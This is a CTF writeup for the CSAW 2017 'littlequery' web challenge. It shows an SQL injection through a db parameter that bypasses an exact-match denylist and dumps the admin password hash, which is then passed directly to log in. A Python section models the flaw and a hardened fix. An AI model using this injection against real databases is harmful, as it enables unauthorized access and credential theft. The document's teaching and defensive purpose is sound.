CSAW CTF Qualification Round 2017 -- littlequery -- Web200 Writeup

problem description

LittleQuery
I've got a new website for BIG DATA analytics!
http://littlequery.chal.csaw.io


in the source code of the first page there is an html comment pointing to an api

/api/db_explore.php">API</a></p>


check it

Must specify mode={schema|preview}

let's try schema

http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema

{"dbs":["littlequery"]}


this feature lets us see the db structure

http://littlequery.chal.csaw.io/api/db_explore.php?mode=schema&db=littlequery&table=user

{"columns":{"uid":"int(11)","username":"varchar(128)","password":"varchar(40)"}}

if we try to see the content using preview, we are blocked

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery&table=user

Database 'littlequery' is not allowed to be previewed.

but this looks like a dummy filter

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequeryTEST&table=user

`littlequeryTEST`.`user` doesn't exist.

so the db query is something like this

select * from `$db`.`$table`


since only the exact value littlequery in the db var is blocked, we can do sql injection through db: close the backtick ourselves and comment out the rest

http://littlequery.chal.csaw.io/api/db_explore.php?mode=preview&db=littlequery`.`user`--%20-&table=

[{"uid":"1","username":"admin","password":"5896e92d38ee883cc09ad6f88df4934f6b074cf8"}]

and there you get the hash

use it to log in: pass the hash directly in the post request and get the flag

flag{mayb3_1ts_t1m3_4_real_real_escape_string?}
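
Why the filter fails and what a fix looks like, as an added example that is not the challenge's own code. The server source is not shown in this writeup, so `weak_preview_query` is a Python model inferred from the responses above; `safe_preview_query`, `quote_ident`, `effective_sql`, `outcome` and the `demo`.`sample` allowlist entry are hypothetical names and constructed values.

```python
import re

BLOCKED_DBS = {"littlequery"}        # assumed denylist, inferred from the error message
PREVIEWABLE = {("demo", "sample")}   # constructed allowlist entry for the hardened version
IDENT = re.compile(r"[A-Za-z0-9_]{1,64}")

def weak_preview_query(db, table):
    # Exact-match denylist, then raw interpolation between backticks.
    if db in BLOCKED_DBS:
        raise PermissionError(f"Database '{db}' is not allowed to be previewed.")
    return f"select * from `{db}`.`{table}`"

def quote_ident(name):
    # Identifiers cannot be bound as parameters, and string escapers such as
    # mysqli_real_escape_string leave backticks alone, so validate the name itself.
    if not IDENT.fullmatch(name):
        raise ValueError(f"invalid identifier: {name!r}")
    return f"`{name}`"

def safe_preview_query(db, table):
    # Validate both names first, then allow only known (db, table) pairs.
    quoted = f"{quote_ident(db)}.{quote_ident(table)}"
    if (db, table) not in PREVIEWABLE:
        raise PermissionError(f"{db}.{table} is not previewable")
    return f"select * from {quoted}"

def effective_sql(query):
    # Naive model of MySQL dropping everything after a "-- " comment marker.
    return query.split("-- ", 1)[0].rstrip()

def outcome(builder, db, table):
    # What the database would run, or the name of the error that stopped it.
    try:
        return effective_sql(builder(db, table))
    except (PermissionError, ValueError) as exc:
        return type(exc).__name__

# db value from the writeup's URL, percent-decoded
WRITEUP_DB = "littlequery`.`user`-- -"

if __name__ == "__main__":
    for builder in (weak_preview_query, safe_preview_query):
        for db, table in [("littlequery", "user"), (WRITEUP_DB, ""), ("demo", "sample")]:
            print(builder.__name__, repr(db), "->", outcome(builder, db, table))
```

The weak builder compares the raw parameter with the blocked name before the backticks are interpreted, so a value that only starts with `littlequery` passes the check; the hardened builder rejects it at identifier validation before any SQL is assembled.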

